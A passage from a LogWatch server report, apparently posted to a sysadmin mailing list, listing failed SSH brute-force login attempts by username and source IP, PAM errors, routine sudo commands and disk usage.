abel/keyboard-interactive/pam from 211.144.151.111: 5 Time(s)
abel/keyboard-interactive/pam from 70.154.244.35: 2 Time(s)
abel/keyboard-interactive/pam from 80.152.224.33: 1 Time(s)
abel/keyboard-interactive/pam from 96.225.194.10: 4 Time(s)
abel/none from 121.210.120.93: 1 Time(s)
abel/none from 125.77.106.246: 1 Time(s)
abel/none from 200.170.141.134: 1 Time(s)
abel/none from 211.144.151.111: 5 Time(s)
abel/none from 70.154.244.35: 2 Time(s)
abel/none from 80.152.224.33: 1 Time(s)
abel/none from 96.225.194.10: 4 Time(s)
abi/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
abi/keyboard-interactive/pam from 211.144.151.111: 4 Time(s)
abi/keyboard-interactive/pam from 70.154.244.35: 1 Time(s)
abi/keyboard-interactive/pam from 80.152.224.33: 1 Time(s)
abi/keyboard-interactive/pam from 96.225.194.10: 3 Time(s)
abi/none from 121.210.120.93: 1 Time(s)
abi/none from 200.170.141.134: 1 Time(s)
abi/none from 211.144.151.111: 4 Time(s)
abi/none from 70.154.244.35: 3 Time(s)
abi/none from 80.152.224.33: 1 Time(s)
abi/none from 96.225.194.10: 3 Time(s)
abraham/keyboard-interactive/pam from 121.210.120.93: 1 Time(s)
abraham/keyboard-interactive/pam from 211.144.151.111: 3 Time(s)
abraham/keyboard-interactive/pam from 70.154.244.35: 2 Time(s)
abraham/keyboard-interactive/pam from 96.225.194.10: 1 Time(s)
abraham/none from 121.210.120.93: 1 Time(s)
abraham/none from 211.144.151.111: 3 Time(s)
abraham/none from 70.154.244.35: 2 Time(s)
abraham/none from 96.225.194.10: 1 Time(s)
access/keyboard-interactive/pam from 211.144.151.111: 7 Time(s)
access/keyboard-interactive/pam from 70.154.244.35: 1 Time(s)
access/none from 211.144.151.111: 7 Time(s)
access/none from 70.154.244.35: 2 Time(s)
admin/none from 124.30.164.50: 1 Time(s)
admin/none from 220.114.252.36: 3 Time(s)
admin/none from 65.98.53.173: 55 Time(s)
admin/password from 124.30.164.50: 1 Time(s)
admin/password from 220.114.252.36: 3 Time(s)
admin/password from 65.98.53.173: 55 Time(s)
alias/password from 59.63.25.158: 1 Time(s)
gt05/none from 124.30.164.50: 1 Time(s)
gt05/password from 124.30.164.50: 1 Time(s)
logic/none from 220.114.252.36: 3 Time(s)
logic/password from 220.114.252.36: 3 Time(s)
recruit/none from 59.63.25.158: 4 Time(s)
recruit/password from 59.63.25.158: 4 Time(s)
rvadmin/none from 65.98.53.173: 4 Time(s)
rvadmin/password from 65.98.53.173: 4 Time(s)
sales/none from 59.63.25.158: 5 Time(s)
sales/password from 59.63.25.158: 5 Time(s)
staff/none from 59.63.25.158: 5 Time(s)
staff/password from 59.63.25.158: 5 Time(s)
stud/none from 124.30.164.50: 1 Time(s)
stud/password from 124.30.164.50: 1 Time(s)
t1na/none from 220.114.252.36: 6 Time(s)
t1na/password from 220.114.252.36: 6 Time(s)
trash/none from 124.30.164.50: 1 Time(s)
trash/password from 124.30.164.50: 1 Time(s)
william/none from 124.30.164.50: 1 Time(s)
william/password from 124.30.164.50: 1 Time(s)
User login attempt failed because:
shell /sbin/nologin does not exist:
alias : 1 Time(s)
Users logging in through sshd:
dmah:
S010600c049d9e99b.cg.shawcable.net (70.73.105.151): 3 times
Error in PAM authentication:
User not known to the underlying authentication module for illegal user Schueler from 121.210.120.93 : 1 Time(s)
User not known to the underlying authentication module for illegal user Schueler from 121.33.199.40 : 4 Time(s)
User not known to the underlying authentication module for illegal user Schueler from 125.77.106.246 : 5 Time(s)
User not known to the underlying authentication module for illegal user Schueler from 200-170-141-134.static.ctbctelecom.com.br : 2 Time(s)
User not known to the underlying authentication module for illegal user Schueler from 201.2.56.34 : 5 Time(s)
User not known to the underlying authentication module for illegal user Schueler from 211.144.151.111 : 5 Time(s)
User not known to the underlying authentication module for illegal user Schueler from 88-149-158-50.vps.virtuo.it : 3 Time(s)
User not known to the underlying authentication module for illegal user Schueler from adsl-070-154-244-035.sip.pfn.bellsouth.net : 7 Time(s)
User not known to the underlying authentication module for illegal user Schueler from mail.elpen.gr : 9 Time(s)
User not known to the underlying authentication module for illegal user Schueler from p5098e021.dip0.t-ipconnect.de : 2 Time(s)
User not known to the underlying authentication module for illegal user Schueler from smtp.clickx3.com : 5 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from 125.77.106.246 : 4 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from 200-170-141-134.static.ctbctelecom.com.br : 1 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from 201.2.56.34 : 1 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from 211.144.151.111 : 5 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from 88-149-158-50.vps.virtuo.it : 3 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from adsl-070-154-244-035.sip.pfn.bellsouth.net : 7 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from mail.elpen.gr : 4 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from p5098e021.dip0.t-ipconnect.de : 2 Time(s)
User not known to the underlying authentication module for illegal user Studentenclub from smtp.clickx3.com : 4 Time(s)
User not known to the underlying authentication module for illegal user abel from 121.210.120.93 : 1 Time(s)
User not known to the underlying authentication module for illegal user abel from 125.77.106.246 : 1 Time(s)
User not known to the underlying authentication module for illegal user abel from 200-170-141-134.static.ctbctelecom.com.br : 1 Time(s)
User not known to the underlying authentication module for illegal user abel from 211.144.151.111 : 5 Time(s)
User not known to the underlying authentication module for illegal user abel from adsl-070-154-244-035.sip.pfn.bellsouth.net : 2 Time(s)
User not known to the underlying authentication module for illegal user abel from p5098e021.dip0.t-ipconnect.de : 1 Time(s)
User not known to the underlying authentication module for illegal user abel from smtp.clickx3.com : 4 Time(s)
User not known to the underlying authentication module for illegal user abi from 121.210.120.93 : 1 Time(s)
User not known to the underlying authentication module for illegal user abi from 211.144.151.111 : 4 Time(s)
User not known to the underlying authentication module for illegal user abi from adsl-070-154-244-035.sip.pfn.bellsouth.net : 1 Time(s)
User not known to the underlying authentication module for illegal user abi from p5098e021.dip0.t-ipconnect.de : 1 Time(s)
User not known to the underlying authentication module for illegal user abi from smtp.clickx3.com : 3 Time(s)
User not known to the underlying authentication module for illegal user abraham from 121.210.120.93 : 1 Time(s)
User not known to the underlying authentication module for illegal user abraham from 211.144.151.111 : 3 Time(s)
User not known to the underlying authentication module for illegal user abraham from adsl-070-154-244-035.sip.pfn.bellsouth.net : 2 Time(s)
User not known to the underlying authentication module for illegal user abraham from smtp.clickx3.com : 1 Time(s)
User not known to the underlying authentication module for illegal user access from 211.144.151.111 : 7 Time(s)
User not known to the underlying authentication module for illegal user access from adsl-070-154-244-035.sip.pfn.bellsouth.net : 1 Time(s)
**Unmatched Entries**
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
error: Could not get shadow information for NOUSER
---------------------- SSHD End -------------------------
--------------------- Sudo (secure-log) Begin ------------------------
==============================================================================
dmah => root
------------------------------------------------------------------------------
/bin/su -
==============================================================================
root => root
------------------------------------------------------------------------------
/usr/bin/apt-get update
/usr/bin/apt-get install
---------------------- Sudo (secure-log) End -------------------------
--------------------- Syslogd Begin ------------------------
Syslogd started 1 Time(s)
---------------------- Syslogd End -------------------------
------------------ Disk Space --------------------
/dev/hda3 72G 34G 35G 50% /
/dev/hda1 92M 6.3M 81M 8% /boot
###################### LogWatch End #########################
More information about the Sysadmin
mailing list